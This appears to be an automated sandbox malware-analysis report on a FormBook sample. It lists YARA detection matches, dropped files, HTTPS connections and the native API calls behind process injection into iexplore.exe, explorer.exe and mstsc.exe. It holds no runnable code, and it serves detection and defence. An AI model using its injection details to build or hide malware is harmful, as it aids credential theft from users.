          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49788 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49798 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49797 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49816 version: TLS 1.2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003596C1 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,6_2_003596C1

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Detected FormBook malware
          Source: C:\Windows\SysWOW64\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\260P27U-\260logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\mstsc.exeDropped file: C:\Users\user\AppData\Roaming\260P27U-\260logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: iexplore.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: mstsc.exe PID: 7840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A47C NtClose,1_2_0041A47C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2B60 NtClose,LdrInitializeThunk,1_2_036F2B60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AD0 NtReadFile,LdrInitializeThunk,1_2_036F2AD0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F30 NtCreateSection,LdrInitializeThunk,1_2_036F2F30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FE0 NtCreateFile,LdrInitializeThunk,1_2_036F2FE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FB0 NtResumeThread,LdrInitializeThunk,1_2_036F2FB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_036F2EA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_036F2E80
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_036F2D30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,1_2_036F2D10
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_036F2DF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,1_2_036F2DD0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_036F2C70
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F4340 NtSetContextThread,1_2_036F4340
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3010 NtOpenDirectoryObject,1_2_036F3010
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3090 NtSetValueKey,1_2_036F3090
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F4650 NtSuspendThread,1_2_036F4650
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F35C0 NtCreateMutant,1_2_036F35C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BE0 NtQueryValueKey,1_2_036F2BE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BF0 NtAllocateVirtualMemory,1_2_036F2BF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BA0 NtEnumerateValueKey,1_2_036F2BA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2B80 NtQueryInformationFile,1_2_036F2B80
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AF0 NtWriteFile,1_2_036F2AF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AB0 NtWaitForSingleObject,1_2_036F2AB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F39B0 NtGetContextThread,1_2_036F39B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F60 NtCreateProcessEx,1_2_036F2F60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FA0 NtQuerySection,1_2_036F2FA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F90 NtProtectVirtualMemory,1_2_036F2F90
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2E30 NtWriteVirtualMemory,1_2_036F2E30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2EE0 NtQueueApcThread,1_2_036F2EE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3D70 NtOpenThread,1_2_036F3D70
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D00 NtSetInformationFile,1_2_036F2D00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3D10 NtOpenProcessToken,1_2_036F3D10
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DB0 NtEnumerateKey,1_2_036F2DB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C60 NtCreateKey,1_2_036F2C60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C00 NtQueryInformationProcess,1_2_036F2C00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CF0 NtOpenProcess,1_2_036F2CF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CC0 NtQueryVirtualMemory,1_2_036F2CC0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CA0 NtQueryInformationToken,1_2_036F2CA0
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAE232 NtCreateFile,NtReadFile,5_2_0FAAE232
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAFE12 NtProtectVirtualMemory,5_2_0FAAFE12
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAFE0A NtProtectVirtualMemory,5_2_0FAAFE0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C35C0 NtCreateMutant,LdrInitializeThunk,6_2_051C35C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C4650 NtSuspendThread,LdrInitializeThunk,6_2_051C4650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C3090 NtSetValueKey,LdrInitializeThunk,6_2_051C3090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C4340 NtSetContextThread,LdrInitializeThunk,6_2_051C4340
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_051C2D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D00 NtSetInformationFile,LdrInitializeThunk,6_2_051C2D00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_051C2D30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_051C2DD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_051C2DF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_051C2C70
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2C60 NtCreateKey,LdrInitializeThunk,6_2_051C2C60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_051C2CA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2F30 NtCreateSection,LdrInitializeThunk,6_2_051C2F30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2FB0 NtResumeThread,LdrInitializeThunk,6_2_051C2FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2FE0 NtCreateFile,LdrInitializeThunk,6_2_051C2FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_051C2E80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_051C2EA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_051C2EE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C39B0 NtGetContextThread,LdrInitializeThunk,6_2_051C39B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2B60 NtClose,LdrInitializeThunk,6_2_051C2B60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_051C2BA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_051C2BF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_051C2BE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2AD0 NtReadFile,LdrInitializeThunk,6_2_051C2AD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2AF0 NtWriteFile,LdrInitializeThunk,6_2_051C2AF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C3010 NtOpenDirectoryObject,6_2_051C3010
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B041B0_2_00007FFD9B8B041B
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8DB1380_2_00007FFD9B8DB138
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B09250_2_00007FFD9B8B0925
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8DB0C00_2_00007FFD9B8DB0C0
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B28400_2_00007FFD9B8B2840
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B35880_2_00007FFD9B8B3588
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B35C00_2_00007FFD9B8B35C0
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B04A80_2_00007FFD9B8B04A8
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeCode function: 0_2_00007FFD9B8B26080_2_00007FFD9B8B2608
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0040102C1_2_0040102C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041DB2A1_2_0041DB2A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041D5961_2_0041D596
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409E4B1_2_00409E4B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00409E501_2_00409E50
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041DE5E1_2_0041DE5E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041E7A01_2_0041E7A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377A3521_2_0377A352
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AD34C1_2_036AD34C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377132D1_2_0377132D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE3F01_2_036CE3F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037803E61_2_037803E6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0370739A1_2_0370739A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037602741_2_03760274
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037612ED1_2_037612ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD2F01_2_036DD2F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB2C01_2_036DB2C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037402C01_2_037402C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C52A01_2_036C52A0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F516C1_2_036F516C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378B16B1_2_0378B16B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF1721_2_036AF172
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037481581_2_03748158
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B01001_2_036B0100
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375A1181_2_0375A118
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037781CC1_2_037781CC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037801AA1_2_037801AA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CB1B01_2_036CB1B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377F0E01_2_0377F0E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037770E91_2_037770E9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C01_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376F0CC1_2_0376F0CC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C07701_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E47501_2_036E4750
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BC7C01_2_036BC7C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377F7B01_2_0377F7B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DC6E01_2_036DC6E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037716CC1_2_037716CC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037775711_2_03777571
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C05351_2_036C0535
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375D5B01_2_0375D5B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037805911_2_03780591
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B14601_2_036B1460
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037724461_2_03772446
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377F43F1_2_0377F43F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376E4F61_2_0376E4F6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FB761_2_0377FB76
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377AB401_2_0377AB40
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03735BF01_2_03735BF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036FDBF91_2_036FDBF9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03776BD71_2_03776BD7
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DFB801_2_036DFB80
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03733A6C1_2_03733A6C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03777A461_2_03777A46
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FA491_2_0377FA49
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376DAC61_2_0376DAC6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03705AA01_2_03705AA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375DAAC1_2_0375DAAC
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BEA801_2_036BEA80
